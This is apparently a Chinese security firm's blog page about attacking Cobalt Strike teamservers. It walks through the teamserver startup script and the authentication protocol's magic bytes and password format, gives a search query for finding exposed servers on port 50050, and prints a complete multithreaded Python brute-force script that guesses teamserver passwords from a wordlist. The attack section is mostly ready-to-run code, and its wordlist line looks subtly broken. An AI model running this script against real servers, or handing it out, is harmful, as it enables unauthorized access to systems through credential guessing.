服务热线
15527777548/18696195380
发布时间:2022-04-08
简要描述:
0x00:简介#Cobalt strike(下面简称 CS)#众所周知,CS是一个以MSF为基础的GUI框架式“多人运动”渗透测试工具,集成了端口转发、服务扫描、自动化溢出,多模式端口监听,exe、power...
if [ -e ./cobaltstrike.store ]; then print_info "Will use existing X509 certificate and keystore (for SSL)" else print_info "Generating X509 certificate and keystore (for SSL)" keytool -keystore ./cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias cobaltstrike -dname "CN=Major Cobalt Strike, OU=AdvancedPenTesting, O=cobaltstrike, L=Somewhere, S=Cyberspace, C=Earth" fi # start the team server. java -XX:ParallelGCThreads=4 -Dcobaltstrike.server_port=50050 -Djavax.net.ssl.keyStore=./cobaltstrike.store -Djavax.net.ssl.keyStorePassword=123456 -server -XX:+AggressiveHeap -XX:+UseParallelGC -classpath ./cobaltstrike.jar server.TeamServer $*
4 Byte Magic \x00\x00\xBE\xEF 1 Byte Password Length (unsigned int) Password (unsigned int cast char array) Padding \x65 "A" * ( Length( Password ) - 256 )
在导线上看起来像这样,但是填充被忽略,可以是任何东西。身份验证例程最多读取256个“长度”。#
\x00\x00\xBE\xEF\x08passwordAAAAAAAAAAAAAA...AAAA
<此密码不能为空>
\x00\x00\xCA\xFE
否则,团队服务器返回null#
\x00\x00\x00\x00
三、python3编写思路#
conn.open(host, port) payload = bytearray(b"\x00\x00\xbe\xef") + len(password).to_bytes(1, "big", signed=True) + bytes(bytes(password, "ascii").ljust(256, b"A")) conn.send(payload)
"Cobalt strike" && port="50050"
五、开整
#!/usr/bin/env python3 import time,socket,ssl,argparse,concurrent.futures,sys MIN_PYTHON = (3, 3) if sys.version_info < MIN_PYTHON: sys.exit("Python %s.%s or later is required." % MIN_PYTHON) parser = argparse.ArgumentParser() parser.add_argument("host", help="Teamserver address") parser.add_argument("wordlist", nargs="?", help="Newline-delimited word list file") args = parser.parse_args() class NotConnectedException(Exception): def __init__(self, message=None, node=None): self.message = message self.node = node class DisconnectedException(Exception): def __init__(self, message=None, node=None): self.message = message self.node = node class Connector: def __init__(self): self.sock = None self.ssl_sock = None self.ctx = ssl.SSLContext() self.ctx.verify_mode = ssl.CERT_NONE pass def is_connected(self): return self.sock and self.ssl_sock def open(self, hostname, port): self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.sock.settimeout(10) self.ssl_sock = self.ctx.wrap_socket(self.sock) if hostname == socket.gethostname(): ipaddress = socket.gethostbyname_ex(hostname)[2][0] self.ssl_sock.connect((ipaddress, port)) else: self.ssl_sock.connect((hostname, port)) def close(self): if self.sock: self.sock.close() self.sock = None self.ssl_sock = None def send(self, buffer): if not self.ssl_sock: raise NotConnectedException("Not connected (SSL Socket is null)") self.ssl_sock.sendall(buffer) def receive(self): if not self.ssl_sock: raise NotConnectedException("Not connected (SSL Socket is null)") received_size = 0 data_buffer = b"" while received_size < 4: data_in = self.ssl_sock.recv() data_buffer = data_buffer + data_in received_size += len(data_in) return data_buffer def passwordcheck(password): if len(password) > 0: result = None conn = Connector() conn.open(args.host, 50050) payload = bytearray(b"\x00\x00\xbe\xef") + len(password).to_bytes(1, "big", signed=True) + bytes(bytes(password, "ascii").ljust(256, b"A")) conn.send(payload) if conn.is_connected(): result = conn.receive() if conn.is_connected(): conn.close() if result == bytearray(b"\x00\x00\xca\xfe"): return password else: return False else: print("Do not have a blank password!!!") passwords = [] if args.wordlist: passwords = open(args.wordlist).read().split("") else: for line in sys.stdin: passwords.append(line.rstrip()) if len(passwords) > 0: attempts = 0 failures = 0 with concurrent.futures.ThreadPoolExecutor(max_workers=30) as executor: future_to_check = {executor.submit(passwordcheck, password): password for password in passwords} for future in concurrent.futures.as_completed(future_to_check): password = future_to_check[future] try: data = future.result() attempts = attempts + 1 if data: print ("Successful Attack!!!") print ("Secquan NB!!") print("Target Password: {}".format(password)) except Exception as exc: failures = failures + 1 print('%r generated an exception: %s' % (password, exc)) else: print("Password(s) required")
pass.txt是你要爆破的密码文件
上一篇:反序列化JNDI分析
如果您有任何问题,请跟我们联系!
联系我们